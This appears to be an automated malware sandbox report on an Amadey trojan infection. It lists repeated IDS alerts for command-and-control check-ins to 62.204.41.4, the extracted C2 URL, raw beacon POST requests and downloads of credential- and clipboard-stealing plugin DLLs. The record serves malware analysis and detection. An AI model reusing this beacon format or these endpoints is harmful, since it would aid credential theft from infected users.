                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50029 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50030 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50031 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50032 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50033 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50034 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50035 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50036 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50037 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50038 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50039 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50040 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50041 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50042 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50043 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50044 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50045 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50046 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50047 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50048 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50049 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50050 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50051 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50052 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50053 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50054 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50055 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50056 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50057 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50058 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50059 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50060 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50061 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50062 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50063 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50064 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50066 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50067 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50068 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50069 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50070 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50071 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50072 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50073 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50074 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50075 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50076 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50077 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50078 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50079 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50080 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50081 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50082 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50083 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50084 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50085 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50086 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50087 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50088 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50089 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50090 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50091 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50092 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50093 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50094 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50095 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50096 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50097 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50098 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50099 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50100 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50101 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50102 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50103 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50104 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50105 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50106 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50107 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50108 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50109 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50110 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50111 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50112 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50113 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50114 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50115 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50116 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50117 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50118 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50119 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50120 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50121 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50122 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50123 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50124 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50125 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50126 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50127 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50128 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50129 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50130 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50131 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50132 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50133 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50134 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50135 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50136 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50137 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50138 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50139 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50140 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50141 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50142 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50143 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50144 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50145 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50146 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50147 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50148 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50149 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50150 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50151 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50152 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50153 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50154 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50155 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50156 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50157 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50158 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50159 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50160 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50161 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50162 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50163 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50164 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50165 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50166 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50167 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50168 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50169 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50170 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50171 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50172 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50173 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50174 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50175 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50176 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50177 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50178 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50179 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50180 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50182 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50183 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50184 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50185 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50186 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50187 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50188 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50189 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50190 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50191 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50192 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50193 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50194 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50195 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50196 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50197 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50198 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50199 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50200 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50201 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50202 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50203 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50204 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50205 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50206 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50207 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50208 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50209 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50210 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50211 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50212 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50213 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50214 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50215 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50216 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50217 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50218 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50219 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50220 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50221 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50222 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50223 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50224 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50225 -> 62.204.41.4:80
                          Source: Malware configuration extractorURLs: 62.204.41.4/Gol478Ns/index.php
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
